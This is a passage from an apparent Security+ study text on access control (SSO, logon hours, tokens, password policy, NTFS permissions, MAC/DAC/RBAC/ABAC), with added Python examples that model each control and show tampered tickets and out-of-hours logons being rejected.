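            return None  # altered or forged ticket
        claims = json.loads(payload)
        if now >= claims["exp"]:
            return None  # session ticket has expired; the user must sign in again
        return claims["sub"]


def demo() -> dict:
    key = os.urandom(32)
    sso = SsoServer(key, ttl_seconds=3600)
    sso.add_user("sjenkins", "Winter!2016")  # constructed sample account
    mail = Application("mail", key)
    files = Application("files", key)
    t0 = 1_451_606_400  # constructed timestamp: 2016-01-01T00:00:00Z

    ticket = sso.sign_in("sjenkins", "Winter!2016", t0)
    # A ticket whose claims were edited after issue no longer matches its signature.
    payload_b64, signature_b64 = ticket.split(".")
    claims = json.loads(base64.urlsafe_b64decode(payload_b64))
    claims["sub"] = "administrator"
    tampered = (base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).decode()
                + "." + signature_b64)
    return {
        "bad_password": sso.sign_in("sjenkins", "wrong", t0),  # None
        "mail": mail.access(ticket, t0 + 60),                 # "sjenkins"
        "files": files.access(ticket, t0 + 120),              # "sjenkins"
        "expired": files.access(ticket, t0 + 3600),           # None
        "tampered": mail.access(tampered, t0 + 60),           # None
    }
```

The point the example makes about the text's caveat is visible in `Application.access`: every participating system has to implement the same ticket check, which is exactly the integration work that makes SSO harder to roll out on a diverse network.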
Exam Tip: The CompTIA Security+ exam will very likely contain questions regarding single sign-on because it is such a prevalent topic and a very common approach to multisystem authentication.
In reality, SSO is usually a little more difficult to implement than vendors would lead you to believe. To be effective and useful, all your applications need to be able to access and use the authentication provided by the SSO process. The more diverse your network, the less likely this is to be the case. If your network, like most, contains different operating systems, custom applications, and a diverse user base, SSO may not even be a viable option.
Time of Day Restrictions
Some organizations need to tightly control certain users, groups, or even roles and limit access to certain resources to specific days and times. Most server-class operating systems enable administrators to implement time of day restrictions that limit when a user can log in, when certain resources can be accessed, and so on. Time of day restrictions are usually specified for individual accounts, as shown in Figure 11.6.
• Figure 11.6 Logon hours for Guest account
From a security perspective, time of day restrictions can be very useful. If a user normally accesses certain resources during normal business hours, an attempt to access these resources outside this time period (either at night or on the weekend) might indicate an attacker has gained access to or is trying to gain access to that account. Specifying time of day restrictions can also serve as a mechanism to enforce internal controls of critical or sensitive resources. Obviously, a drawback to enforcing time of day restrictions is that it means that a user can't go to work outside of normal hours to "catch up" with work tasks. As with all security policies, usability and security must be balanced in this policy decision.
Be careful implementing time of day restrictions. Some operating systems give you the option of disconnecting users as soon as their "allowed login time" expires regardless of what the user is doing at the time. The more commonly used approach is to allow currently logged-in users to stay connected but reject any login attempts that occur outside of allowed hours.
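An added example of the logon-hours control just described (example code, not a Windows implementation): a per-account table of allowed weekdays and hours, a check applied to each logon attempt, the two session-expiry behaviours contrasted, and a review pass over constructed logon events that surfaces out-of-hours attempts as the detection signal the text mentions. The policy table, account names, addresses and log lines are all constructed for the example.

```python
import datetime as dt

# Constructed policy table: account -> {weekday (0 = Monday): (start_hour, end_hour)}.
# Hours are local time, the end hour is exclusive, and a missing weekday means no logon that day.
BUSINESS_HOURS = {day: (8, 18) for day in range(5)}    # Mon-Fri 08:00-17:59
ALWAYS = {day: (0, 24) for day in range(7)}
ACCOUNT_HOURS = {
    "bjones": BUSINESS_HOURS,
    "svc_backup": ALWAYS,    # constructed service account that runs at night and on weekends
}


def logon_allowed(account: str, when: dt.datetime) -> bool:
    """True if the account's logon hours permit a new logon at this moment."""
    hours = ACCOUNT_HOURS.get(account)
    if hours is None:
        return False         # assumption: accounts with no policy entry are denied
    window = hours.get(when.weekday())
    return window is not None and window[0] <= when.hour < window[1]


def session_may_continue(account: str, started_iso: str, now_iso: str,
                         disconnect_when_hours_end: bool) -> bool:
    """Models the two behaviours in the text for a session that outlives its allowed hours."""
    started = dt.datetime.fromisoformat(started_iso)
    now = dt.datetime.fromisoformat(now_iso)
    if not logon_allowed(account, started):
        return False         # should never have been admitted in the first place
    if disconnect_when_hours_end:
        return logon_allowed(account, now)   # strict option: cut the session when hours expire
    return True              # common approach: existing sessions stay, only new logons are refused


# Constructed sample events: "<ISO time> LOGON <account> <source address>"
SAMPLE_LOG = """\
2016-01-04T09:12:00 LOGON bjones 10.0.0.15
2016-01-04T17:55:00 LOGON bjones 10.0.0.15
2016-01-04T18:20:00 LOGON bjones 10.0.0.15
2016-01-05T02:30:00 LOGON bjones 198.51.100.7
2016-01-09T11:00:00 LOGON bjones 10.0.0.15
2016-01-09T11:00:00 LOGON svc_backup 10.0.0.2
"""


def review_logons(log_text: str):
    """Applies the policy to each event and collects out-of-hours attempts for investigation."""
    decisions, alerts = [], []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        stamp, _event, account, source = line.split()
        when = dt.datetime.fromisoformat(stamp)
        allowed = logon_allowed(account, when)
        decisions.append((stamp, account, "ALLOW" if allowed else "REJECT"))
        if not allowed:
            alerts.append(f"{stamp} out-of-hours logon attempt for {account} from {source}")
    return decisions, alerts


if __name__ == "__main__":
    decisions, alerts = review_logons(SAMPLE_LOG)
    for decision in decisions:
        print(*decision)
    for alert in alerts:
        print("ALERT:", alert)
```

In the sample, 2016-01-04 is a Monday and 2016-01-09 a Saturday, so the 18:20 weekday attempt, the 02:30 attempt from an outside address and the Saturday attempt are rejected and flagged, while the service account's weekend logon passes.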
Tokens
While the username/password combination has been and continues to be the cheapest and most popular method of controlling access to resources, many organizations look for a more secure and tamper-resistant form of authentication. Usernames and passwords are "something you know" (which can be used by anyone else who knows or discovers the information). A more secure method of authentication is to combine the "something you know" with "something you have." A token is an authentication factor that typically takes the form of a physical or logical entity that the user must be in possession of to access their account or certain resources. Most tokens are physical tokens that display a series of numbers that changes every 30 to 90 seconds, such as the token pictured in Figure 11.7 from Blizzard Entertainment. This sequence of numbers must be entered when the user is attempting to log in or access certain resources. The ever-changing sequence of numbers is synchronized to a remote server such that when the user enters the correct username, password, and matching sequence of numbers, he is allowed to log in. Even if an attacker obtains the username and password, the attacker cannot log in without the matching sequence of numbers. Other physical tokens include Common Access Cards (CACs), USB tokens, smart cards, and PC cards.
• Figure 11.7 Token authenticator from Blizzard Entertainment
Tokens may also be implemented in software. Software tokens still provide two-factor authentication but don't require the user to have a physical device on hand. Some tokens require software clients that store a symmetric key (sometimes called a seed record) in a secured location on the user's device (laptop, desktop, tablet, and so on). Other software tokens use public key cryptography. Asymmetric cryptography solutions, such as public key cryptography, often associate a PIN with a specific user's token. To log in or access critical resources, the user must supply the correct PIN. The PIN is stored on a remote server and is used during the authentication process so that if a user presents the right token, but not the right PIN, the user's access can be denied. This helps prevent an attacker from gaining access if he gets a copy of or gains access to the software token.
Cross Check
Symmetric and Asymmetric Cryptography
You learned about symmetric and asymmetric cryptography in Chapter 5. What is the difference between the two methods? Which one uses public keys?
Tech Tip
Best Practice: Password Expiration
One of the best practices an organization can implement is to attach an expiration date to user passwords. This helps ensure that if a password is compromised, the period that the account remains compromised is limited. In most environments and operating systems, this is expressed in terms of the number of days before the password expires and is no longer valid. For example, a maximum password age of 90 days means that a particular password will expire 90 days after that password was initially set to its current value.
Account and Password Expiration
Another common restriction that can be enforced in many access control mechanisms is either (or both) an account expiration or password expiration feature. This allows administrators to specify a period of time for which a password or an account will be active. For password expiration, when the expiration date is reached, the user generally is asked to create a new password. This means that if the password (and thus the account) has been compromised when the expiration date is reached and a new password is set, the attacker will again (hopefully) be locked out of the system. The attacker can't change the password himself, since the user would then be locked out and would contact an administrator to have the password reset, thus again locking out the attacker. Another attack option would involve the attacker setting a new password on the compromised account and then attempting to reset the account back to the original, compromised password. If the attacker is successful, a new expiration time would be set for the account but the old password would still be used and the user would not be locked out of their account; in most cases, the user wouldn't notice anything had happened at all as their old password would continue to work. This is one reason why a password history mechanism should be used. The history is used to keep track of previously used passwords so that they cannot be reused.
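The domain password policy elements listed earlier (history, maximum and minimum age, minimum length, complexity) and the change-and-change-back problem just described come together in this added example, which is the editor's illustration rather than the book's code or the Windows implementation. A hypothetical policy object is applied to a sequence of password changes on a constructed account; the history is kept as salted hashes rather than in reversible form, and the minimum-age and history checks are what reject an immediate change back to a previous password. The policy defaults, account name and dates are the example's own assumptions.

```python
from __future__ import annotations

import datetime as dt
import hashlib
import hmac
import os
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Hypothetical enforcement of the domain password policy elements described above.
# Settings and defaults are the example's own, not values from any real domain.


@dataclass
class PasswordPolicy:
    enforce_password_history: int = 24     # previous passwords that may not be reused
    maximum_password_age: int = 90         # days before a password must be changed
    minimum_password_age: int = 1          # days before a password may be changed again
    minimum_password_length: int = 8
    complexity_required: bool = True       # characters from 3 of the 4 groups


@dataclass
class Account:
    username: str
    # (salt, PBKDF2 digest) of the current and previous passwords, newest first.
    # Only hashes are kept, so the history never holds a reversible form of a password.
    history: List[Tuple[bytes, bytes]] = field(default_factory=list)
    last_set: Optional[dt.date] = None


def _digest(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def meets_complexity(password: str) -> bool:
    """At least three of: English uppercase, English lowercase, numeral, non-alphanumeric."""
    groups = [
        any("A" <= c <= "Z" for c in password),
        any("a" <= c <= "z" for c in password),
        any("0" <= c <= "9" for c in password),
        any(not c.isalnum() for c in password),
    ]
    return sum(groups) >= 3


def _in_history(policy: PasswordPolicy, account: Account, password: str) -> bool:
    for salt, digest in account.history[:policy.enforce_password_history]:
        if hmac.compare_digest(_digest(password, salt), digest):
            return True
    return False


def evaluate_change(policy: PasswordPolicy, account: Account,
                    new_password: str, today: dt.date) -> List[str]:
    """Names every policy element the proposed change violates; an empty list means allowed."""
    violations = []
    if len(new_password) < policy.minimum_password_length:
        violations.append("minimum password length")
    if policy.complexity_required and not meets_complexity(new_password):
        violations.append("password must meet complexity requirements")
    if account.last_set is not None and (today - account.last_set).days < policy.minimum_password_age:
        # Minimum age stops a password being changed and immediately changed back.
        violations.append("minimum password age")
    if _in_history(policy, account, new_password):
        # History is what blocks resetting the account to the old, compromised password.
        violations.append("enforce password history")
    return violations


def apply_change(policy: PasswordPolicy, account: Account,
                 new_password: str, today: dt.date) -> List[str]:
    violations = evaluate_change(policy, account, new_password, today)
    if not violations:
        salt = os.urandom(16)
        account.history.insert(0, (salt, _digest(new_password, salt)))
        account.last_set = today
    return violations


def password_expired(policy: PasswordPolicy, account: Account, today: dt.date) -> bool:
    """Maximum age: once this many days have passed the user must choose a new password."""
    return account.last_set is None or (today - account.last_set).days >= policy.maximum_password_age


def demo() -> dict:
    policy = PasswordPolicy()
    acct = Account("bjones")                   # constructed sample account
    day0 = dt.date(2016, 1, 1)

    def day(n: int) -> dt.date:
        return day0 + dt.timedelta(days=n)

    return {
        "initial": apply_change(policy, acct, "Winter!2016", day(0)),      # []
        "too_soon": apply_change(policy, acct, "Summer#2016", day(0)),     # minimum password age
        "rotated": apply_change(policy, acct, "Summer#2016", day(2)),      # []
        "reused": apply_change(policy, acct, "Winter!2016", day(4)),       # enforce password history
        "short": apply_change(policy, acct, "Jan!16", day(6)),             # minimum password length
        "simple": apply_change(policy, acct, "januarypassword", day(8)),   # complexity
        "expired_day_95": password_expired(policy, acct, day(95)),         # True
    }
```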
Tech Tip
Heartbleed
In 2014 a vulnerability that could cause user credentials to be exposed was discovered in millions of systems. Called the Heartbleed incident, this resulted in numerous users being told to change their passwords because of potential compromise. Users were also warned of the dangers of reusing passwords across different accounts. Although this makes passwords easier to remember, it also improves guessing chances. What made this whole effort of protecting your passwords particularly challenging is that the breach was widespread—virtually all Linux systems—and the patching rate was uneven, so people could be suffering multiple exposures over time. After one year, an estimated 40% of all compromised systems remained unpatched. This highlights the importance of not reusing passwords across multiple accounts.
Security Controls and Permissions
If multiple users share a computer system, the system administrator likely needs to control who is allowed to do what when it comes to viewing, using, or changing system resources. While operating systems vary in how they implement these types of controls, most operating systems use the concepts of permissions and rights to control and safeguard access to resources. As we discussed earlier, permissions control what a user is allowed to do with objects on a system and rights define the actions a user can perform on the system itself. Let's examine how the Windows operating systems implement this concept.
The Windows operating systems use the concepts of permissions and rights to control access to files, folders, and information resources. When using the NTFS file system, administrators can grant users and groups permission to perform certain tasks as they relate to files, folders, and Registry keys. The basic categories of NTFS permissions are as follows:
Exam Tip: Permissions can be applied to specific users or groups to control that user's or group's ability to view, modify, access, use, or delete resources such as folders and files.
Full Control: A user/group can change permissions on the folder/file, take ownership if someone else owns the folder/file, delete subfolders and files, and perform actions permitted by all other NTFS folder permissions.
Modify: Users/groups can view and modify files/folders and their properties, can delete and add files/folders, and can delete or add properties to a file/folder.
Read & Execute: Users/groups can view the file/folder and can execute scripts and executables but cannot make any changes (files/folders are read-only).
List Folder Contents: A user/group can list only what is inside the folder (applies to folders only).
Read: Users/groups can view the contents of the file/folder and the file/folder properties.
Write: Users/groups can write to the file or folder.
Figure 11.8 shows the permissions on a folder called Data from a Windows Server system. In the top half of the Permissions window are the users and groups that have permissions for this folder. In the bottom half of the window are the permissions assigned to the highlighted user or group.
• Figure 11.8 Permissions for the Data folder
The Windows operating system also uses user rights or privileges to determine what actions a user or group is allowed to perform or access. These user rights are typically assigned to groups, as it is easier to deal with a few groups than to assign rights to individual users, and they are usually defined in either a group or a local security policy. The list of user rights is quite extensive, but a few examples of user rights are
Log on locally  Users/groups can attempt to log on to the local system itself.
Access this computer from the network  Users/groups can attempt to access this system through the network connection.
Manage auditing and security log  Users/groups can view, modify, and delete auditing and security log information.
Rights tend to be actions that deal with accessing the system itself, process control, logging, and so on. Figure 11.9 shows the user rights contained in the local security policy on a Windows system.
• Figure 11.9 User Rights Assignment options from Windows Local Security Policy
Folders and files are not the only things that can be safeguarded or controlled using permissions. Even access and use of peripherals, such as printers, can be controlled using permissions. Figure 11.10 shows the Security tab from a printer attached to a Windows system. Permissions can be assigned to control who can print to the printer, who can manage documents and print jobs sent to the printer, and who can manage the printer itself. With this type of granular control, administrators have a great deal of control over how system resources are used and who uses them.
• Figure 11.10 Security tab showing printer permissions in Windows
Exam Tip: Although it is very important to get security settings "right the first time," it is just as important to perform routine audits of security settings such as user accounts, group memberships, file permissions, and so on.
A very important concept to consider when assigning rights and privileges to users is the concept of least privilege. Least privilege requires that users be given the absolute minimum number of rights and privileges required to perform their authorized duties. For example, if a user does not need the ability to install software on their own desktop to perform their job, then don't give them that ability. This reduces the likelihood the user will load malware, insecure software, or unauthorized applications onto their system.
Access Control Lists
The term access control list (ACL) is used in more than one manner in the field of computer security. When discussing routers and firewalls, an ACL is a set of rules used to control traffic flow into or out of an interface or network. When discussing system resources, such as files and folders, an ACL lists permissions attached to an object—who is allowed to view, modify, move, or delete that object. To illustrate this concept, consider an example. Figure 11.11 shows the access control list (permissions) for the Data folder. The user identified as Billy Williams has Read & Execute, List Folder Contents, and Read permissions, meaning this user can open the folder, see what's in the folder, and so on. Figure 11.12 shows the permissions for a user identified as Leah Jones, who has only Read permissions on the same folder.
• Figure 11.11 Permissions for Billy Williams on the Data folder
• Figure 11.12 Permissions for Leah Jones on the Data folder
In computer systems and networks, there are several ways that access controls can be implemented. An access control matrix provides the simplest framework for illustrating the process. An example of an access control matrix is provided in Table 11.1. In this matrix, the system is keeping track of two processes, two files, and one hardware device. Process 1 can read both File 1 and File 2 but can write only to File 1. Process 1 cannot access Process 2, but Process 2 can execute Process 1. Both processes have the ability to write to the printer.
Table 11.1 An Access Control Matrix
While simple to understand, the access control matrix is seldom used in computer systems because it is extremely costly in terms of storage space and processing. Imagine the size of an access control matrix for a large network with hundreds of users and thousands of files.
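The matrix the text describes for Table 11.1, as an added example that is not part of the book: the cells are stored sparsely (only the granted rights), which is how a real system avoids the dense-matrix storage cost, and a missing cell means deny. The subject and object names are the ones the text uses; Process 2's access to the two files is not described in the text, so those cells are left empty.

```python
# Added example (not from the book): a sparse access control matrix holding
# the entries the text describes for Table 11.1.
from typing import Dict, Set, Tuple

# Rows are subjects, columns are objects, and each cell is a set of rights.
Matrix = Dict[Tuple[str, str], Set[str]]

SUBJECTS = ["Process 1", "Process 2"]
OBJECTS = ["File 1", "File 2", "Process 1", "Process 2", "Printer"]


def build_table_11_1() -> Matrix:
    """Build only the cells the text describes; every other cell stays empty."""
    m: Matrix = {}

    def grant(subject: str, obj: str, *rights: str) -> None:
        m.setdefault((subject, obj), set()).update(rights)

    grant("Process 1", "File 1", "read", "write")
    grant("Process 1", "File 2", "read")
    grant("Process 2", "Process 1", "execute")
    grant("Process 1", "Printer", "write")
    grant("Process 2", "Printer", "write")
    # The text does not describe Process 2's file access, so those cells are empty.
    return m


def check(m: Matrix, subject: str, obj: str, right: str) -> bool:
    """Default deny: a cell that was never granted is an empty set of rights."""
    return right in m.get((subject, obj), set())


def render(m: Matrix) -> str:
    """Lay the matrix out in the tabular form of Table 11.1."""
    width = max(len(o) for o in OBJECTS) + 2
    lines = ["".ljust(12) + "".join(o.ljust(width) for o in OBJECTS)]
    for s in SUBJECTS:
        cells = ["/".join(sorted(m.get((s, o), set()))) or "-" for o in OBJECTS]
        lines.append(s.ljust(12) + "".join(c.ljust(width) for c in cells))
    return "\n".join(lines)


def full_matrix_cells(n_subjects: int, n_objects: int) -> int:
    """Cells a dense matrix would need: the storage cost the text warns about."""
    return n_subjects * n_objects


if __name__ == "__main__":
    table = build_table_11_1()
    print(render(table))
    print("non-empty cells stored:", len(table))
    print("dense cells for 500 users x 10,000 files:", full_matrix_cells(500, 10_000))
```

Only five cells are stored for the table, whereas a dense matrix for 500 users and 10,000 files would need five million cells, most of them empty; this is the reason ACLs (one object's column) and capability lists (one subject's row) are what systems actually keep.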
Mandatory Access Control (MAC)
Mandatory access control (MAC) is the process of controlling access to information based on the sensitivity of that information and whether or not the user is operating at the appropriate sensitivity level and has the authority to access that information. Under a MAC system, each piece of information and every system resource (files, devices, networks, and so on) is labeled with its sensitivity level (such as Public, Engineering Private, Jones Secret). Users are assigned a clearance level that sets the upper boundary of the information and devices that they are allowed to access.
Exam Tip: Mandatory access control restricts access based on the sensitivity of the information and whether or not the user has the authority to access that information.
The access control and sensitivity labels are required in a MAC system. Labels are defined and then assigned to users and resources. Users must then operate within their assigned sensitivity and clearance levels—they don't have the option to modify their own sensitivity levels or the levels of the information resources they create. Due to the complexity involved, MAC is typically run only on systems where security is a top priority such as Trusted Solaris, OpenBSD, and SELinux.
Tech Tip
MAC Objective
Mandatory access controls are often mentioned in discussions of multilevel security. For multilevel security to be implemented, a mechanism must be present to identify the classification of all users and files. A file identified as Top Secret (has a label indicating that it is Top Secret) may be viewed only by individuals with a Top Secret clearance. For this control mechanism to work reliably, all files must be marked with appropriate controls and all user access must be checked. This is the primary goal of MAC.
Figure 11.13 illustrates MAC in operation. The information resource on the left has been labeled "Engineering Secret," meaning only users in the Engineering group operating at the Secret sensitivity level or above can access that resource. The top user is operating at the Secret level but is not a member of Engineering and is denied access to the resource. The middle user is a member of Engineering but is operating at a Public sensitivity level and is therefore denied access to the resource. The bottom user is a member of Engineering, is operating at a Secret sensitivity level, and is allowed to access the information resource.
• Figure 11.13 Logical representation of mandatory access control
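The decision Figure 11.13 depicts, as an added example that is not from the book: a label is a sensitivity level plus a set of compartments (here the Engineering group), a session label may read a resource only if it dominates the resource's label on both parts, and the user's clearance caps the session label so users cannot raise their own level. The level ordering, with Public treated as the lowest level, is an assumption made for the example.

```python
# Added example (not from the book): a mandatory access control check that
# combines a sensitivity level with a compartment (group) label, the
# "Engineering Secret" style of label used in Figure 11.13.
from dataclasses import dataclass
from typing import FrozenSet

# Assumed level ordering; "Public" is treated as the lowest level.
LEVELS = {"Public": 0, "Confidential": 1, "Secret": 2, "Top Secret": 3}


@dataclass(frozen=True)
class Label:
    level: str
    compartments: FrozenSet[str] = frozenset()

    def dominates(self, other: "Label") -> bool:
        """At least as high a level and a superset of the other label's compartments."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and other.compartments <= self.compartments)


def may_read(session: Label, resource: Label) -> bool:
    """Read access is granted only if the session label dominates the resource label."""
    return session.dominates(resource)


def open_session(clearance: Label, requested: Label) -> Label:
    """The clearance is an upper bound: a user cannot operate above it or outside its groups."""
    if not clearance.dominates(requested):
        raise PermissionError("requested session label exceeds clearance")
    return requested


ENGINEERING_SECRET = Label("Secret", frozenset({"Engineering"}))

if __name__ == "__main__":
    top = Label("Secret")                                 # Secret, not in Engineering
    middle = Label("Public", frozenset({"Engineering"}))  # Engineering, operating at Public
    bottom = Label("Secret", frozenset({"Engineering"}))  # Engineering, operating at Secret
    for name, user in (("top", top), ("middle", middle), ("bottom", bottom)):
        print(name, "allowed" if may_read(user, ENGINEERING_SECRET) else "denied")
    # A Confidential clearance cannot open a Secret session, even inside Engineering.
    try:
        open_session(Label("Confidential", frozenset({"Engineering"})), bottom)
    except PermissionError as e:
        print("denied:", e)
```

The three users of the figure produce denied, denied, allowed, and the same check also lets a Top Secret Engineering session read the resource, which is the "or above" in the text.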
Discretionary Access Control (DAC)
Discretionary access control (DAC) is the process of using file permissions and optional ACLs to restrict access to information based on a user's identity or group membership. DAC is the most common access control system and is commonly used in both UNIX and Windows operating systems. The "discretionary" part of DAC means that a file or resource owner has the ability to change the permissions on that file or resource.
Tech Tip
Multilevel Security
In the U.S. government, the following security labels are used to classify information and information resources for MAC systems:
Top Secret  The highest security level and is defined as information that would cause "exceptionally grave damage" to national security if disclosed.
Secret  The second highest level and is defined as information that would cause "serious damage" to national security if disclosed.
Confidential  The lowest level of classified information and is defined as information that would "damage" national security if disclosed.
For Official Use Only  Information that is unclassified but not releasable to public or unauthorized parties. Sometimes called Sensitive But Unclassified (SBU).
Unclassified  Not an official classification level.
The labels work in a top-down fashion so that an individual holding a Secret clearance would have access to information at the Secret, Confidential, and Unclassified levels. An individual with a Secret clearance would not have access to Top Secret resources, as that label is above the highest level of the individual's clearance.
Under UNIX operating systems, file permissions consist of three distinct parts:
Owner permissions (read, write, and execute)  The owner of the file
Group permissions (read, write, and execute)  The group to which the owner of the file belongs
World permissions (read, write, and execute)  Anyone else who is not the owner and does not belong to the group to which the owner of the file belongs
Exam Tip: Discretionary access control restricts access based on the user's identity or group membership.
For example, suppose a file called secretdata has been created by the owner of the file, Luke, who is part of the Engineering group. The owner permissions on the file would reflect Luke's access to the file (as the owner). The group permissions would reflect the access granted to anyone who is part of the Engineering group. The world permissions would represent the access granted to anyone who is not Luke and is not part of the Engineering group. In UNIX, a file's permissions are usually displayed as a series of nine characters, with the first three characters representing the owner's permissions, the second three characters representing the group permissions, and the last three characters representing the permissions for everyone else, or for the world. This concept is illustrated in Figure 11.14.
• Figure 11.14 Discretionary file permissions in the UNIX environment
Suppose the file secretdata is owned by Luke with group permissions for Engineering (because Luke is part of the Engineering group), and the permissions on that file are rwx, rw-, and ---, as shown in Figure 11.14. This would mean that:
Luke can read, write, and execute the file (rwx).
Members of the Engineering group can read and write the file but not execute it (rw-).
The world has no access to the file and can't read, write, or execute it (---).
Remember that under the DAC model, the file's owner, Luke, can change the file's permissions any time he wants.
Role-Based Access Control (RBAC)
Access control lists can be cumbersome and can take time to administer properly. Role-based access control (RBAC) is the process of managing access and privileges based on the user's assigned roles. RBAC is the access control model that most closely resembles an organization's structure. In this scheme, instead of each user being assigned specific access permissions for the objects associated with the computer system or network, that user is assigned a set of roles that the user may perform. The roles are in turn assigned the access permissions necessary to perform the tasks associated with the role. Users will thus be granted permissions to objects in terms of the specific duties they must perform—not just because of a security classification associated with individual objects.
As defined by the "Orange Book," a Department of Defense document (in the "rainbow series") that at one time was the standard for describing what constituted a trusted computing system, a discretionary access control (DAC) is "a means of restricting access to objects based on the identity of subjects and/or groups to which they belong. The controls are discretionary in the sense that a subject with a certain access permission is capable of passing that permission (perhaps indirectly) on to any other subject (unless restrained by mandatory access control)."
Under RBAC, you must first determine the activities that must be performed and the resources that must be accessed by specific roles. For example, the role of "securityadmin" in Microsoft SQL Server must be able to create and manage logins, read error logs, and audit the application. Once all the roles are created and the rights and privileges associated with those roles are determined, users can then be assigned one or more roles based on their job functions. When a role is assigned to a specific user, the user gets all the rights and privileges assigned to that role.
Exam Tip: Role-based and rule-based access control can both be abbreviated as RBAC. Standard convention is for RBAC to be used to denote role-based access control. A seldom-seen acronym for rule-based access control is RB-RBAC. Role-based focuses on the user's role (administrator, backup operator, and so on). Rule-based focuses on predefined criteria such as time of day (users can only log in between 8 A.M. and 6 P.M.) or type of network traffic (web traffic is allowed to leave the organization).
Unfortunately, in reality, administrators often find themselves in a position of working in an organization where more than one user has multiple roles or even access to multiple accounts (a situation quite common in smaller organizations). Users with multiple accounts tend to select the same or similar passwords for those accounts, thereby increasing the chance one compromised account can lead to the compromise of other accounts accessed by that user. Where possible, administrators should first eliminate shared or additional accounts for users and then examine the possibility of combining roles or privileges to reduce the "account footprint" of individual users.
Rule-Based Access Control
Rule-based access control is yet another method of managing access and privileges (and unfortunately shares the same acronym as role-based access control). In this method, access is either allowed or denied based on a set of predefined rules. Each object has an associated ACL (much like DAC), and when a particular user or group attempts to access the object, the appropriate rule is applied.
Exam Tip: The CompTIA Security+ exam will very likely expect you to be able to differentiate between the four major forms of access control discussed here: mandatory access control, discretionary access control, role-based access control, and rule-based access control.
A good example for rule-based access control is permitted logon hours. Many operating systems give administrators the ability to control the hours during which users can log in. For example, a bank may allow its employees to log in only between the hours of 8 A.M. and 6 P.M. Monday through Saturday. If a user attempts to log in outside of these hours, 3 A.M. on Sunday for example, then the rule will reject the login attempt whether or not the user supplies valid login credentials.
Attribute-Based Access Control (ABAC)
Attribute-based access control (ABAC) is a new access control schema based on the use of attributes associated with an identity. These can use any type of attributes (user attributes, resource attributes, environment attributes, and so on), such as location, time, activity being requested, and user credentials. An example would be a doctor getting one set of access for a specific patient versus a different patient. ABAC can be represented via the eXtensible Access Control Markup Language (XACML), a standard that implements attribute- and policy-based access control schemes.
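One policy decision point that applies the three models just discussed in sequence, as an added example that is not from the book and serves the role-based, rule-based, and attribute-based sections together: the bank's logon-hours rule is evaluated first, since the text says it rejects the attempt regardless of credentials; then the user's roles are resolved to permissions (the securityadmin permissions are the ones the text lists for SQL Server); and finally an attribute predicate decides the doctor and patient case. User names, the doctor's attending list, and the timestamps are constructed; the "doctor" role is assumed.

```python
# Added example (not from the book): one decision function applying a
# rule-based logon-hours check, role-based permissions, and an attribute-based
# check for the doctor/patient case. Names and hours are constructed.
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Set

# Role-based: roles carry permissions, users carry roles.
ROLE_PERMISSIONS: Dict[str, Set[str]] = {
    "securityadmin": {"create_login", "manage_login", "read_error_log", "audit"},
    "doctor": {"read_patient_record"},  # assumed role for the ABAC case
}
USER_ROLES: Dict[str, Set[str]] = {"alice": {"securityadmin"}, "drjones": {"doctor"}}


def role_permissions(user: str) -> Set[str]:
    """Union of the permissions of every role assigned to the user."""
    perms: Set[str] = set()
    for role in USER_ROLES.get(user, set()):
        perms |= ROLE_PERMISSIONS.get(role, set())
    return perms


# Rule-based: the bank's logon window, 8 A.M. up to 6 P.M., Monday through Saturday.
def logon_hours_allow(when: datetime) -> bool:
    return when.weekday() <= 5 and 8 <= when.hour < 18


# Attribute-based: the decision looks at user, resource and environment attributes.
@dataclass
class Request:
    user: str
    action: str
    resource: Dict[str, str]
    user_attrs: Dict[str, Set[str]] = field(default_factory=dict)
    when: datetime = field(default_factory=datetime.now)


def attribute_policy(req: Request) -> bool:
    """A doctor may read a record only for a patient they are attending."""
    if req.resource.get("type") != "patient_record":
        return True  # this policy does not apply to other resource types
    attending = req.user_attrs.get("attending_patients", set())
    return req.resource.get("patient_id") in attending


def decide(req: Request) -> str:
    """Any stage may deny; the logon-hours rule runs first, before credentials matter."""
    if not logon_hours_allow(req.when):
        return "deny: outside permitted logon hours"
    if req.action not in role_permissions(req.user):
        return "deny: no role grants " + req.action
    if not attribute_policy(req):
        return "deny: attribute policy"
    return "permit"


def demo() -> List[str]:
    """Constructed requests: 2016-03-01 is a Tuesday, 2016-03-06 a Sunday."""
    tuesday_10am = datetime(2016, 3, 1, 10, 0)
    sunday_3am = datetime(2016, 3, 6, 3, 0)
    doctor = {"attending_patients": {"P-100"}}
    return [
        decide(Request("alice", "audit", {"type": "server"}, when=tuesday_10am)),
        decide(Request("alice", "audit", {"type": "server"}, when=sunday_3am)),
        decide(Request("bob", "audit", {"type": "server"}, when=tuesday_10am)),
        decide(Request("drjones", "read_patient_record",
                       {"type": "patient_record", "patient_id": "P-100"}, doctor, tuesday_10am)),
        decide(Request("drjones", "read_patient_record",
                       {"type": "patient_record", "patient_id": "P-200"}, doctor, tuesday_10am)),
    ]


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The two doctor requests differ only in the resource attribute patient_id, which is the point of the text's example: the role grants the action, but the attribute policy decides per patient.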
Account Expiration
In addition to all the other methods of controlling and restricting access, most modern operating systems allow administrators to specify the length of time an account is valid and when it "expires" or is disabled. This is a great method for controlling temporary accounts, or accounts for contractors or contract employees. For these accounts, the administrator can specify an expiration date; when the date is reached, the account automatically becomes locked out and cannot be logged into without administrator intervention. A related action can be taken with accounts that never expire: they can automatically be marked "inactive" and locked out if they have been unused for a specified number of days. Account expiration is similar to password expiration, in that it limits the time window of potential compromise. When an account has expired, it cannot be used unless the expiration deadline is extended.
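The expiration and inactivity checks described above, as an added example that is not from the book: an account becomes unusable when it is disabled, when its expiration date is reached, or when it has gone unused for longer than the inactivity threshold, and only an administrator action (here extend_expiration) reopens an expired account. The 90-day threshold, account names and dates are constructed.

```python
# Added example (not from the book): deciding whether an account may still be
# used, applying the expiration date and the inactivity rule the text describes.
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List, Optional


@dataclass
class Account:
    name: str
    expires: Optional[date] = None      # None means the account never expires
    last_logon: Optional[date] = None   # None means never used
    disabled: bool = False


def account_state(acct: Account, today: date, inactivity_days: int = 90) -> str:
    """Return the reason an account is unusable, or 'active'."""
    if acct.disabled:
        return "disabled"
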